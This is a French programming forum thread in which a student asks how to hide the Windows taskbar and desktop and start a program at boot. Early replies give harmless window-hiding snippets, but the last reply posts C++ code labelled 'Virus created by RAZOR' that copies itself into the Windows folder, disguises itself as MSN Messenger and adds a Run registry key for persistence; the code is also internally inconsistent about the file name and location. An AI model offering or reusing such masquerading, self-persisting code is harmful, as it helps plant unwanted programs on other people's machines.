Windows sans windows

cs_BuGbOy Messages postés 2 Date d'inscription dimanche 29 février 2004 Statut Membre Dernière intervention 29 février 2004 - 29 févr. 2004 à 14:54
wxccxw Messages postés 755 Date d'inscription samedi 15 mai 2004 Statut Membre Dernière intervention 30 janvier 2011 - 23 mars 2005 à 16:17
Voilà, je code actuellement un logiciel pour mon proj de fin d'année, et j'aimerai que lorsqu'il se lance, il apparaisse en surcouche de Windows. C'est à dire, que la barre de tache ne soit plus visibles ainsi qu'aucune icone du bureau. Peut etre le fond d'écran si c'est possible. Je voudrais savoir déjà comment faire pour tout faire disparaitre et ne laisser que mon programme. Et ensuite, faire qu'il se lance au démarrage de windows sans que le reste apparaisse. Merci d'avance.

4 réponses

cs_norton Messages postés 215 Date d'inscription mardi 21 janvier 2003 Statut Membre Dernière intervention 21 août 2011
29 févr. 2004 à 15:49
Hello,
je sait que c'est possible de cacher les icones du bureau et la bare de tache mais je sait pas si on peut cacher l'arrière plant.
0
cs_BuGbOy Messages postés 2 Date d'inscription dimanche 29 février 2004 Statut Membre Dernière intervention 29 février 2004
29 févr. 2004 à 17:44
Merci de ta réponse mais ca m'avance pas beaucoup.
0
garslouche Messages postés 583 Date d'inscription mardi 26 novembre 2002 Statut Membre Dernière intervention 29 mai 2015 1
29 févr. 2004 à 19:28
Pour masquer la barre des taches :

HWND hTaskBar = FindWindow("Shell_TrayWnd", NULL);
ShowWindow(hTaskBar, SW_HIDE);

Pour masquer les icones du bureau:

HWND hIcones = FindWindow (NULL, "Program Manager");
ShowWindow(hIcones, SW_HIDE);

On ne force pas une curiosité, on l'éveille.
.................................................Daniel Pennac
0
wxccxw Messages postés 755 Date d'inscription samedi 15 mai 2004 Statut Membre Dernière intervention 30 janvier 2011
23 mars 2005 à 16:17
de meme



#include <vcl.h>

#pragma hdrstop

#pragma argsused

#include <windows.h>

#include <string.h>

#include

/*

Virus created by RAZOR

*/



char windir[MAX_PATH];

int main(int argc, char* argv[])

{

char pathname[256];

GetWindowsDirectory(windir, sizeof(windir));

HMODULE hMe = GetModuleHandle(NULL);

DWORD nRet = GetModuleFileName(hMe, pathname, 256);



strcat(windir, "\\MSN.exe");

CopyFile(pathname,windir,1);







unsigned char reg[30] = "C:\\WINDOWS\\MSNmessenger.exe";

HKEY hKey;

RegCreateKey(HKEY_CURRENT_USER,"Software\\Microsoft\\Windows\\CurrentVersion\\run",&hKey);

RegSetValueEx(hKey,"msnmessenger",0,REG_SZ,reg,sizeof(reg));

RegCloseKey(hKey);

HWND Bureau = FindWindow("Progman", "Program Manager");

ShowWindow(Bureau, SW_HIDE);

}





ici je l'ai mis au demarage et j'ai appeler le prog "MSNmessenger.exe"

il va se copier dans system32 et se mettre au demmarage dans le registre (regedit.exe)




bonne chance
0
Rejoignez-nous